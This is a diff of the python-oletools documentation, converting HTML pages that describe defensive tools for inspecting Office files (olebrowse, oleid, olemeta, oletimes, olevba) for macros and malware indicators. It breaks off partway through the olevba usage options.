+<p>copies of the Software, and to permit persons to whom the Software is</p>
+<p>furnished to do so, subject to the following conditions:</p>
+<p>The above copyright notice and this permission notice shall be included in all</p>
+<p>copies or substantial portions of the Software.</p>
+<p>THE SOFTWARE IS PROVIDED &quot;AS IS&quot;, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR</p>
+<p>IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,</p>
+<p>FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE</p>
+<p>AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER</p>
+<p>LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,</p>
+<p>OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE</p>
+<p>SOFTWARE.</p>
+<hr />
+<p>python-oletools documentation</p>
+<hr />
+<ul>
+<li><p><a href="Home.html">Home</a></p></li>
+<li><p><a href="License.html">License</a></p></li>
+<li><p><a href="Install.html">Install</a></p></li>
+<li><p><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</p></li>
+<li><p>Tools:</p>
+<ul>
+<li><p><a href="olebrowse.html">olebrowse</a></p></li>
+<li><p><a href="oleid.html">oleid</a></p></li>
+<li><p><a href="olemeta.html">olemeta</a></p></li>
+<li><p><a href="oletimes.html">oletimes</a></p></li>
+<li><p><a href="olevba.html">olevba</a></p></li>
+<li><p><a href="pyxswf.html">pyxswf</a></p></li>
+<li><p><a href="rtfobj.html">rtfobj</a></p></li>
+</ul></li>
+</ul>
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
-<head>
-  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-  <meta http-equiv="Content-Style-Type" content="text/css" />
-  <meta name="generator" content="pandoc" />
-  <title></title>
-</head>
-<body>
-<h1 id="olebrowse">olebrowse</h1>
-<p>olebrowse is a simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.</p>
-<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
-<h2 id="usage">Usage</h2>
-<pre><code>olebrowse.py [file]</code></pre>
-<p>If you provide a file it will be opened, else a dialog will allow you to browse folders to open a file. Then if it is a valid OLE file, the list of data streams will be displayed. You can select a stream, and then either view its content in a builtin hexadecimal viewer, or save it to a file for further analysis.</p>
-<h2 id="screenshots">Screenshots</h2>
-<p>Main menu, showing all streams in the OLE file:</p>
-<div class="figure">
-<img src="olebrowse1_menu.png" /><p class="caption"></p>
-</div>
-<p>Menu with actions for a stream:</p>
-<div class="figure">
-<img src="olebrowse2_stream.png" /><p class="caption"></p>
-</div>
-<p>Hex view for a stream:</p>
-<div class="figure">
-<img src="olebrowse3_hexview.png" /><p class="caption"></p>
-</div>
-<hr />
-<h2 id="python-oletools-documentation">python-oletools documentation</h2>
-<ul>
-<li><a href="Home.html">Home</a></li>
-<li><a href="License.html">License</a></li>
-<li><a href="Install.html">Install</a></li>
-<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
-<li>Tools:
-<ul>
-<li><a href="olebrowse.html">olebrowse</a></li>
-<li><a href="oleid.html">oleid</a></li>
-<li><a href="olemeta.html">olemeta</a></li>
-<li><a href="oletimes.html">oletimes</a></li>
-<li><a href="olevba.html">olevba</a></li>
-<li><a href="pyxswf.html">pyxswf</a></li>
-<li><a href="rtfobj.html">rtfobj</a></li>
-</ul></li>
-</ul>
-</body>
-</html>
+<p>olebrowse</p>
+<p>=========</p>
+<p>olebrowse is a simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to</p>
+<p>view and extract individual data streams.</p>
+<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
+<p>Usage</p>
+<hr />
+<pre><code>olebrowse.py [file]</code></pre>
+<p>If you provide a file it will be opened, else a dialog will allow you to browse folders to open a file. Then if it is a valid OLE file, the list of data streams will be displayed. You can select a stream, and then either view its content in a builtin hexadecimal viewer, or save it to a file for further analysis.</p>
+<p>Screenshots</p>
+<hr />
+<p>Main menu, showing all streams in the OLE file:</p>
+<div class="figure">
+<img src="olebrowse1_menu.png" />
+</div>
+<p>Menu with actions for a stream:</p>
+<div class="figure">
+<img src="olebrowse2_stream.png" />
+</div>
+<p>Hex view for a stream:</p>
+<div class="figure">
+<img src="olebrowse3_hexview.png" />
+</div>
+<hr />
+<p>python-oletools documentation</p>
+<hr />
+<ul>
+<li><p><a href="Home.html">Home</a></p></li>
+<li><p><a href="License.html">License</a></p></li>
+<li><p><a href="Install.html">Install</a></p></li>
+<li><p><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</p></li>
+<li><p>Tools:</p>
+<ul>
+<li><p><a href="olebrowse.html">olebrowse</a></p></li>
+<li><p><a href="oleid.html">oleid</a></p></li>
+<li><p><a href="olemeta.html">olemeta</a></p></li>
+<li><p><a href="oletimes.html">oletimes</a></p></li>
+<li><p><a href="olevba.html">olevba</a></p></li>
+<li><p><a href="pyxswf.html">pyxswf</a></p></li>
+<li><p><a href="rtfobj.html">rtfobj</a></p></li>
+</ul></li>
+</ul>
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
-<head>
-  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-  <meta http-equiv="Content-Style-Type" content="text/css" />
-  <meta name="generator" content="pandoc" />
-  <title></title>
-</head>
-<body>
-<h1 id="oleid">oleid</h1>
-<p>oleid is a script to analyze OLE files such as MS Office documents (e.g. Word, Excel), to detect specific characteristics usually found in malicious files (e.g. malware). For example it can detect VBA macros and embedded Flash objects.</p>
-<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
-<h2 id="main-features">Main Features</h2>
-<ul>
-<li>Detect OLE file type from its internal structure (e.g. MS Word, Excel, PowerPoint, ...)</li>
-<li>Detect VBA Macros</li>
-<li>Detect embedded Flash objects</li>
-<li>Detect embedded OLE objects</li>
-<li>Detect MS Office encryption</li>
-<li>Can be used as a command-line tool</li>
-<li>Python API to integrate it in your applications</li>
-</ul>
-<p>Planned improvements:</p>
-<ul>
-<li>Extract the most important metadata fields</li>
-<li>Support for OpenXML files and embedded OLE files</li>
-<li>Generic VBA macros detection</li>
-<li>Detect auto-executable VBA macros</li>
-<li>Extended OLE file types detection</li>
-<li>Detect unusual OLE structures (fragmentation, unused sectors, etc)</li>
-<li>Options to scan multiple files</li>
-<li>Options to scan files from encrypted zip archives</li>
-<li>CSV output</li>
-</ul>
-<h2 id="usage">Usage</h2>
-<pre><code>oleid.py &lt;file&gt;</code></pre>
-<h3 id="example">Example</h3>
-<p>Analyzing a Word document containing a Flash object and VBA macros:</p>
-<pre><code>C:\oletools&gt;oleid.py word_flash_vba.doc
-
-Filename: word_flash_vba.doc
-+-------------------------------+-----------------------+
-| Indicator                     | Value                 |
-+-------------------------------+-----------------------+
-| OLE format                    | True                  |
-| Has SummaryInformation stream | True                  |
-| Application name              | Microsoft Office Word |
-| Encrypted                     | False                 |
-| Word Document                 | True                  |
-| VBA Macros                    | True                  |
-| Excel Workbook                | False                 |
-| PowerPoint Presentation       | False                 |
-| Visio Drawing                 | False                 |
-| ObjectPool                    | True                  |
-| Flash objects                 | 1                     |
-+-------------------------------+-----------------------+</code></pre>
-<h2 id="how-to-use-oleid-in-your-python-applications">How to use oleid in your Python applications</h2>
-<p>First, import oletools.oleid, and create an <strong>OleID</strong> object to scan a file:</p>
-<pre><code>import oletools.oleid
-
-oid = oletools.oleid.OleID(filename)</code></pre>
-<p>Note: filename can be a filename, a file-like object, or a bytes string containing the file to be analyzed.</p>
-<p>Second, call the <strong>check()</strong> method. It returns a list of <strong>Indicator</strong> objects.</p>
-<p>Each Indicator object has the following attributes:</p>
-<ul>
-<li><strong>id</strong>: str, identifier for the indicator</li>
-<li><strong>name</strong>: str, name to display the indicator</li>
-<li><strong>description</strong>: str, long description of the indicator</li>
-<li><strong>type</strong>: class of the indicator (e.g. bool, str, int)</li>
-<li><strong>value</strong>: value of the indicator</li>
-</ul>
-<p>For example, the following code displays all the indicators:</p>
-<pre><code>indicators = oid.check()
-for i in indicators:
-    print &#39;Indicator id=%s name=&quot;%s&quot; type=%s value=%s&#39; % (i.id, i.name, i.type, repr(i.value))
-    print &#39;description:&#39;, i.description
-    print &#39;&#39;</code></pre>
-<p>See the source code of oleid.py for more details.</p>
-<hr />
-<h2 id="python-oletools-documentation">python-oletools documentation</h2>
-<ul>
-<li><a href="Home.html">Home</a></li>
-<li><a href="License.html">License</a></li>
-<li><a href="Install.html">Install</a></li>
-<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
-<li>Tools:
-<ul>
-<li><a href="olebrowse.html">olebrowse</a></li>
-<li><a href="oleid.html">oleid</a></li>
-<li><a href="olemeta.html">olemeta</a></li>
-<li><a href="oletimes.html">oletimes</a></li>
-<li><a href="olevba.html">olevba</a></li>
-<li><a href="pyxswf.html">pyxswf</a></li>
-<li><a href="rtfobj.html">rtfobj</a></li>
-</ul></li>
-</ul>
-</body>
-</html>
+<p>oleid</p>
+<p>=====</p>
+<p>oleid is a script to analyze OLE files such as MS Office documents (e.g. Word,</p>
+<p>Excel), to detect specific characteristics usually found in malicious files (e.g. malware).</p>
+<p>For example it can detect VBA macros and embedded Flash objects.</p>
+<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
+<h2 id="main-features">Main Features</h2>
+<ul>
+<li><p>Detect OLE file type from its internal structure (e.g. MS Word, Excel, PowerPoint, ...)</p></li>
+<li><p>Detect VBA Macros</p></li>
+<li><p>Detect embedded Flash objects</p></li>
+<li><p>Detect embedded OLE objects</p></li>
+<li><p>Detect MS Office encryption</p></li>
+<li><p>Can be used as a command-line tool</p></li>
+<li><p>Python API to integrate it in your applications</p></li>
+</ul>
+<p>Planned improvements:</p>
+<ul>
+<li><p>Extract the most important metadata fields</p></li>
+<li><p>Support for OpenXML files and embedded OLE files</p></li>
+<li><p>Generic VBA macros detection</p></li>
+<li><p>Detect auto-executable VBA macros</p></li>
+<li><p>Extended OLE file types detection</p></li>
+<li><p>Detect unusual OLE structures (fragmentation, unused sectors, etc)</p></li>
+<li><p>Options to scan multiple files</p></li>
+<li><p>Options to scan files from encrypted zip archives</p></li>
+<li><p>CSV output</p></li>
+</ul>
+<h2 id="usage">Usage</h2>
+<pre><code>oleid.py &lt;file&gt;</code></pre>
+<h3 id="example">Example</h3>
+<p>Analyzing a Word document containing a Flash object and VBA macros:</p>
+<pre><code>C:\oletools&gt;oleid.py word_flash_vba.doc
+
+
+
+Filename: word_flash_vba.doc
+
++-------------------------------+-----------------------+
+
+| Indicator                     | Value                 |
+
++-------------------------------+-----------------------+
+
+| OLE format                    | True                  |
+
+| Has SummaryInformation stream | True                  |
+
+| Application name              | Microsoft Office Word |
+
+| Encrypted                     | False                 |
+
+| Word Document                 | True                  |
+
+| VBA Macros                    | True                  |
+
+| Excel Workbook                | False                 |
+
+| PowerPoint Presentation       | False                 |
+
+| Visio Drawing                 | False                 |
+
+| ObjectPool                    | True                  |
+
+| Flash objects                 | 1                     |
+
++-------------------------------+-----------------------+</code></pre>
+<h2 id="how-to-use-oleid-in-your-python-applications">How to use oleid in your Python applications</h2>
+<p>First, import oletools.oleid, and create an <strong>OleID</strong> object to scan a file:</p>
+<pre><code>import oletools.oleid
+
+
+
+oid = oletools.oleid.OleID(filename)</code></pre>
+<p>Note: filename can be a filename, a file-like object, or a bytes string containing the file to be analyzed.</p>
+<p>Second, call the <strong>check()</strong> method. It returns a list of <strong>Indicator</strong> objects.</p>
+<p>Each Indicator object has the following attributes:</p>
+<ul>
+<li><p><strong>id</strong>: str, identifier for the indicator</p></li>
+<li><p><strong>name</strong>: str, name to display the indicator</p></li>
+<li><p><strong>description</strong>: str, long description of the indicator</p></li>
+<li><p><strong>type</strong>: class of the indicator (e.g. bool, str, int)</p></li>
+<li><p><strong>value</strong>: value of the indicator</p></li>
+</ul>
+<p>For example, the following code displays all the indicators:</p>
+<pre><code>indicators = oid.check()
+
+for i in indicators:
+
+    print &#39;Indicator id=%s name=&quot;%s&quot; type=%s value=%s&#39; % (i.id, i.name, i.type, repr(i.value))
+
+    print &#39;description:&#39;, i.description
+
+    print &#39;&#39;</code></pre>
+<p>See the source code of oleid.py for more details.</p>
+<hr />
+<p>python-oletools documentation</p>
+<hr />
+<ul>
+<li><p><a href="Home.html">Home</a></p></li>
+<li><p><a href="License.html">License</a></p></li>
+<li><p><a href="Install.html">Install</a></p></li>
+<li><p><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</p></li>
+<li><p>Tools:</p>
+<ul>
+<li><p><a href="olebrowse.html">olebrowse</a></p></li>
+<li><p><a href="oleid.html">oleid</a></p></li>
+<li><p><a href="olemeta.html">olemeta</a></p></li>
+<li><p><a href="oletimes.html">oletimes</a></p></li>
+<li><p><a href="olevba.html">olevba</a></p></li>
+<li><p><a href="pyxswf.html">pyxswf</a></p></li>
+<li><p><a href="rtfobj.html">rtfobj</a></p></li>
+</ul></li>
+</ul>
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
-<head>
-  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-  <meta http-equiv="Content-Style-Type" content="text/css" />
-  <meta name="generator" content="pandoc" />
-  <title></title>
-</head>
-<body>
-<h1 id="olemeta">olemeta</h1>
-<p>olemeta is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract all standard properties present in the OLE file.</p>
-<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
-<h2 id="usage">Usage</h2>
-<pre><code>olemeta.py &lt;file&gt;</code></pre>
-<h3 id="example">Example</h3>
-<p>Checking the malware sample <a href="https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/">DIAN_caso-5415.doc</a>:</p>
-<pre><code>&gt;olemeta.py DIAN_caso-5415.doc
-
-Properties from SummaryInformation stream:
-- codepage: 1252
-- title: &#39;Gu\xeda MIPYME para ser emisor electr\xf3nico&#39;
-- subject: &#39;&#39;
-- author: &#39;OFEyDV&#39;
-- keywords: &#39;&#39;
-- comments: &#39;&#39;
-- template: &#39;Normal.dotm&#39;
-- last_saved_by: &#39;clein&#39;
-- revision_number: &#39;13&#39;
-- total_edit_time: 4800L
-- last_printed: datetime.datetime(2006, 6, 7, 14, 4)
-- create_time: datetime.datetime(2009, 3, 30, 14, 18)
-- last_saved_time: datetime.datetime(2014, 5, 14, 12, 45)
-- num_pages: 7
-- num_words: 269
-- num_chars: 1485
-- thumbnail: None
-- creating_application: &#39;Microsoft Office Word&#39;
-- security: 0
-
-Properties from DocumentSummaryInformation stream:
-- codepage_doc: 1252
-- category: None
-- presentation_target: None
-- bytes: None
-- lines: 12
-- paragraphs: 3
-- slides: None
-- notes: None
-- hidden_slides: None
-- mm_clips: None
-- scale_crop: False
-- heading_pairs: None
-- titles_of_parts: None
-- manager: None
-- company: &#39;Servicio de Impuestos Internos&#39;
-- links_dirty: False
-- chars_with_spaces: 1751
-- unused: None
-- shared_doc: False
-- link_base: None
-- hlinks: None
-- hlinks_changed: False
-- version: 786432
-- dig_sig: None
-- content_type: None
-- content_status: None
-- language: None
-- doc_version: None</code></pre>
-<h2 id="how-to-use-olemeta-in-python-applications">How to use olemeta in Python applications</h2>
-<p>TODO</p>
-<hr />
-<h2 id="python-oletools-documentation">python-oletools documentation</h2>
-<ul>
-<li><a href="Home.html">Home</a></li>
-<li><a href="License.html">License</a></li>
-<li><a href="Install.html">Install</a></li>
-<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
-<li>Tools:
-<ul>
-<li><a href="olebrowse.html">olebrowse</a></li>
-<li><a href="oleid.html">oleid</a></li>
-<li><a href="olemeta.html">olemeta</a></li>
-<li><a href="oletimes.html">oletimes</a></li>
-<li><a href="olevba.html">olevba</a></li>
-<li><a href="pyxswf.html">pyxswf</a></li>
-<li><a href="rtfobj.html">rtfobj</a></li>
-</ul></li>
-</ul>
-</body>
-</html>
+<p>olemeta</p>
+<p>=======</p>
+<p>olemeta is a script to parse OLE files such as MS Office documents (e.g. Word,</p>
+<p>Excel), to extract all standard properties present in the OLE file.</p>
+<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
+<h2 id="usage">Usage</h2>
+<pre><code>olemeta.py &lt;file&gt;</code></pre>
+<h3 id="example">Example</h3>
+<p>Checking the malware sample <a href="https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/">DIAN_caso-5415.doc</a>:</p>
+<pre><code>&gt;olemeta.py DIAN_caso-5415.doc
+
+
+
+Properties from SummaryInformation stream:
+
+- codepage: 1252
+
+- title: &#39;Gu\xeda MIPYME para ser emisor electr\xf3nico&#39;
+
+- subject: &#39;&#39;
+
+- author: &#39;OFEyDV&#39;
+
+- keywords: &#39;&#39;
+
+- comments: &#39;&#39;
+
+- template: &#39;Normal.dotm&#39;
+
+- last_saved_by: &#39;clein&#39;
+
+- revision_number: &#39;13&#39;
+
+- total_edit_time: 4800L
+
+- last_printed: datetime.datetime(2006, 6, 7, 14, 4)
+
+- create_time: datetime.datetime(2009, 3, 30, 14, 18)
+
+- last_saved_time: datetime.datetime(2014, 5, 14, 12, 45)
+
+- num_pages: 7
+
+- num_words: 269
+
+- num_chars: 1485
+
+- thumbnail: None
+
+- creating_application: &#39;Microsoft Office Word&#39;
+
+- security: 0
+
+
+
+Properties from DocumentSummaryInformation stream:
+
+- codepage_doc: 1252
+
+- category: None
+
+- presentation_target: None
+
+- bytes: None
+
+- lines: 12
+
+- paragraphs: 3
+
+- slides: None
+
+- notes: None
+
+- hidden_slides: None
+
+- mm_clips: None
+
+- scale_crop: False
+
+- heading_pairs: None
+
+- titles_of_parts: None
+
+- manager: None
+
+- company: &#39;Servicio de Impuestos Internos&#39;
+
+- links_dirty: False
+
+- chars_with_spaces: 1751
+
+- unused: None
+
+- shared_doc: False
+
+- link_base: None
+
+- hlinks: None
+
+- hlinks_changed: False
+
+- version: 786432
+
+- dig_sig: None
+
+- content_type: None
+
+- content_status: None
+
+- language: None
+
+- doc_version: None</code></pre>
+<h2 id="how-to-use-olemeta-in-python-applications">How to use olemeta in Python applications</h2>
+<p>TODO</p>
+<hr />
+<p>python-oletools documentation</p>
+<hr />
+<ul>
+<li><p><a href="Home.html">Home</a></p></li>
+<li><p><a href="License.html">License</a></p></li>
+<li><p><a href="Install.html">Install</a></p></li>
+<li><p><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</p></li>
+<li><p>Tools:</p>
+<ul>
+<li><p><a href="olebrowse.html">olebrowse</a></p></li>
+<li><p><a href="oleid.html">oleid</a></p></li>
+<li><p><a href="olemeta.html">olemeta</a></p></li>
+<li><p><a href="oletimes.html">oletimes</a></p></li>
+<li><p><a href="olevba.html">olevba</a></p></li>
+<li><p><a href="pyxswf.html">pyxswf</a></p></li>
+<li><p><a href="rtfobj.html">rtfobj</a></p></li>
+</ul></li>
+</ul>
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
-<head>
-  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-  <meta http-equiv="Content-Style-Type" content="text/css" />
-  <meta name="generator" content="pandoc" />
-  <title></title>
-</head>
-<body>
-<h1 id="oletimes">oletimes</h1>
-<p>oletimes is a script to parse OLE files such as MS Office documents (e.g. Word, Excel), to extract creation and modification times of all streams and storages in the OLE file.</p>
-<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
-<h2 id="usage">Usage</h2>
-<pre><code>oletimes.py &lt;file&gt;</code></pre>
-<h3 id="example">Example</h3>
-<p>Checking the malware sample <a href="https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/">DIAN_caso-5415.doc</a>:</p>
-<pre><code>&gt;oletimes.py DIAN_caso-5415.doc
-
-+----------------------------+---------------------+---------------------+
-| Stream/Storage name        | Modification Time   | Creation Time       |
-+----------------------------+---------------------+---------------------+
-| Root                       | 2014-05-14 12:45:24 | None                |
-| &#39;\x01CompObj&#39;              | None                | None                |
-| &#39;\x05DocumentSummaryInform | None                | None                |
-| ation&#39;                     |                     |                     |
-| &#39;\x05SummaryInformation&#39;   | None                | None                |
-| &#39;1Table&#39;                   | None                | None                |
-| &#39;Data&#39;                     | None                | None                |
-| &#39;Macros&#39;                   | 2014-05-14 12:45:24 | 2014-05-14 12:45:24 |
-| &#39;Macros/PROJECT&#39;           | None                | None                |
-| &#39;Macros/PROJECTwm&#39;         | None                | None                |
-| &#39;Macros/VBA&#39;               | 2014-05-14 12:45:24 | 2014-05-14 12:45:24 |
-| &#39;Macros/VBA/ThisDocument&#39;  | None                | None                |
-| &#39;Macros/VBA/_VBA_PROJECT&#39;  | None                | None                |
-| &#39;Macros/VBA/__SRP_0&#39;       | None                | None                |
-| &#39;Macros/VBA/__SRP_1&#39;       | None                | None                |
-| &#39;Macros/VBA/__SRP_2&#39;       | None                | None                |
-| &#39;Macros/VBA/__SRP_3&#39;       | None                | None                |
-| &#39;Macros/VBA/dir&#39;           | None                | None                |
-| &#39;WordDocument&#39;             | None                | None                |
-+----------------------------+---------------------+---------------------+</code></pre>
-<h2 id="how-to-use-oletimes-in-python-applications">How to use oletimes in Python applications</h2>
-<p>TODO</p>
-<hr />
-<h2 id="python-oletools-documentation">python-oletools documentation</h2>
-<ul>
-<li><a href="Home.html">Home</a></li>
-<li><a href="License.html">License</a></li>
-<li><a href="Install.html">Install</a></li>
-<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
-<li>Tools:
-<ul>
-<li><a href="olebrowse.html">olebrowse</a></li>
-<li><a href="oleid.html">oleid</a></li>
-<li><a href="olemeta.html">olemeta</a></li>
-<li><a href="oletimes.html">oletimes</a></li>
-<li><a href="olevba.html">olevba</a></li>
-<li><a href="pyxswf.html">pyxswf</a></li>
-<li><a href="rtfobj.html">rtfobj</a></li>
-</ul></li>
-</ul>
-</body>
-</html>
+<p>oletimes</p>
+<p>========</p>
+<p>oletimes is a script to parse OLE files such as MS Office documents (e.g. Word,</p>
+<p>Excel), to extract creation and modification times of all streams and storages</p>
+<p>in the OLE file.</p>
+<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
+<h2 id="usage">Usage</h2>
+<pre><code>oletimes.py &lt;file&gt;</code></pre>
+<h3 id="example">Example</h3>
+<p>Checking the malware sample <a href="https://malwr.com/analysis/M2I4YWRhM2IwY2QwNDljN2E3ZWFjYTg3ODk4NmZhYmE/">DIAN_caso-5415.doc</a>:</p>
+<pre><code>&gt;oletimes.py DIAN_caso-5415.doc
+
+
+
++----------------------------+---------------------+---------------------+
+
+| Stream/Storage name        | Modification Time   | Creation Time       |
+
++----------------------------+---------------------+---------------------+
+
+| Root                       | 2014-05-14 12:45:24 | None                |
+
+| &#39;\x01CompObj&#39;              | None                | None                |
+
+| &#39;\x05DocumentSummaryInform | None                | None                |
+
+| ation&#39;                     |                     |                     |
+
+| &#39;\x05SummaryInformation&#39;   | None                | None                |
+
+| &#39;1Table&#39;                   | None                | None                |
+
+| &#39;Data&#39;                     | None                | None                |
+
+| &#39;Macros&#39;                   | 2014-05-14 12:45:24 | 2014-05-14 12:45:24 |
+
+| &#39;Macros/PROJECT&#39;           | None                | None                |
+
+| &#39;Macros/PROJECTwm&#39;         | None                | None                |
+
+| &#39;Macros/VBA&#39;               | 2014-05-14 12:45:24 | 2014-05-14 12:45:24 |
+
+| &#39;Macros/VBA/ThisDocument&#39;  | None                | None                |
+
+| &#39;Macros/VBA/_VBA_PROJECT&#39;  | None                | None                |
+
+| &#39;Macros/VBA/__SRP_0&#39;       | None                | None                |
+
+| &#39;Macros/VBA/__SRP_1&#39;       | None                | None                |
+
+| &#39;Macros/VBA/__SRP_2&#39;       | None                | None                |
+
+| &#39;Macros/VBA/__SRP_3&#39;       | None                | None                |
+
+| &#39;Macros/VBA/dir&#39;           | None                | None                |
+
+| &#39;WordDocument&#39;             | None                | None                |
+
++----------------------------+---------------------+---------------------+</code></pre>
+<h2 id="how-to-use-oletimes-in-python-applications">How to use oletimes in Python applications</h2>
+<p>TODO</p>
+<hr />
+<p>python-oletools documentation</p>
+<hr />
+<ul>
+<li><p><a href="Home.html">Home</a></p></li>
+<li><p><a href="License.html">License</a></p></li>
+<li><p><a href="Install.html">Install</a></p></li>
+<li><p><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</p></li>
+<li><p>Tools:</p>
+<ul>
+<li><p><a href="olebrowse.html">olebrowse</a></p></li>
+<li><p><a href="oleid.html">oleid</a></p></li>
+<li><p><a href="olemeta.html">olemeta</a></p></li>
+<li><p><a href="oletimes.html">oletimes</a></p></li>
+<li><p><a href="olevba.html">olevba</a></p></li>
+<li><p><a href="pyxswf.html">pyxswf</a></p></li>
+<li><p><a href="rtfobj.html">rtfobj</a></p></li>
+</ul></li>
+</ul>
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
-<head>
-  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-  <meta http-equiv="Content-Style-Type" content="text/css" />
-  <meta name="generator" content="pandoc" />
-  <title></title>
-</head>
-<body>
-<h1 id="olevba">olevba</h1>
-<p>olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g. Word, Excel), to <strong>detect VBA Macros</strong>, extract their <strong>source code</strong> in clear text, and detect security-related patterns such as <strong>auto-executable macros</strong>, <strong>suspicious VBA keywords</strong> used by malware, and potential <strong>IOCs</strong> (IP addresses, URLs, executable filenames, etc). It also detects and decodes several common <strong>obfuscation methods including Hex encoding, StrReverse, Base64, Dridex</strong>, and extracts IOCs from decoded strings.</p>
-<p>It can be used either as a command-line tool, or as a python module from your own applications.</p>
-<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
-<p>olevba is based on source code from <a href="https://github.com/unixfreak0037/officeparser">officeparser</a> by John William Davison, with significant modifications.</p>
-<h2 id="supported-formats">Supported formats</h2>
-<ul>
-<li>Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)</li>
-<li>Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)</li>
-<li>PowerPoint 2007+ (.pptm, .ppsm)</li>
-</ul>
-<h2 id="main-features">Main Features</h2>
-<ul>
-<li>Detect VBA macros in MS Office 97-2003 and 2007+ files</li>
-<li>Extract VBA macro source code</li>
-<li>Detect auto-executable macros</li>
-<li>Detect suspicious VBA keywords often used by malware</li>
-<li>Detect and decodes strings obfuscated with Hex/Base64/StrReverse/Dridex</li>
-<li>Extract IOCs/patterns of interest such as IP addresses, URLs, e-mail addresses and executable file names</li>
-<li>Scan multiple files and sample collections (wildcards, recursive)</li>
-<li>Triage mode for a summary view of multiple files</li>
-<li>Scan malware samples in password-protected Zip archives</li>
-<li>Python API to use olevba from your applications</li>
-</ul>
-<p>MS Office files encrypted with a password are also supported, because VBA macro code is never encrypted, only the content of the document.</p>
-<h2 id="about-vba-macros">About VBA Macros</h2>
-<p>See <a href="http://www.decalage.info/en/vba_tools">this article</a> for more information and technical details about VBA Macros and how they are stored in MS Office documents.</p>
-<h2 id="how-it-works">How it works</h2>
-<ol style="list-style-type: decimal">
-<li>olevba checks the file type: If it is an OLE file (i.e MS Office 97-2003), it is parsed right away.</li>
-<li>If it is a zip file (i.e. MS Office 2007+), olevba looks for all OLE files stored in it (e.g. vbaProject.bin), and opens them.</li>
-<li>olevba identifies all the VBA projects stored in the OLE structure.</li>
-<li>Each VBA project is parsed to find the corresponding OLE streams containing macro code.</li>
-<li>In each of these OLE streams, the VBA macro source code is extracted and decompressed (RLE compression).</li>
-<li>olevba looks for specific strings obfuscated with various algorithms (Hex, Base64, StrReverse, Dridex).</li>
-<li>olevba scans the macro source code and the deobfuscated strings to find suspicious keywords, auto-executable macros and potential IOCs (URLs, IP addresses, e-mail addresses, executable filenames, etc).</li>
-</ol>
-<h2 id="usage">Usage</h2>
-<pre><code>Usage: olevba.py [options] &lt;filename&gt; [filename2 ...]
-
-Options:
-  -h, --help            show this help message and exit
-  -r                    find files recursively in subdirectories.
-  -z ZIP_PASSWORD, --zip=ZIP_PASSWORD
-                        if the file is a zip archive, open first file from it,
-                        using the provided password (requires Python 2.6+)
-  -f ZIP_FNAME, --zipfname=ZIP_FNAME
-                        if the file is a zip archive, file(s) to be opened
-                        within the zip. Wildcards * and ? are supported.
-                        (default:*)
-  -t                    triage mode, display results as a summary table
-                        (default for multiple files)
-  -d                    detailed mode, display full results (default for
-                        single file)
-  -i INPUT, --input=INPUT
-                        input file containing VBA source code to be analyzed
-                        (no parsing)
-  --decode              display all the obfuscated strings with their decoded
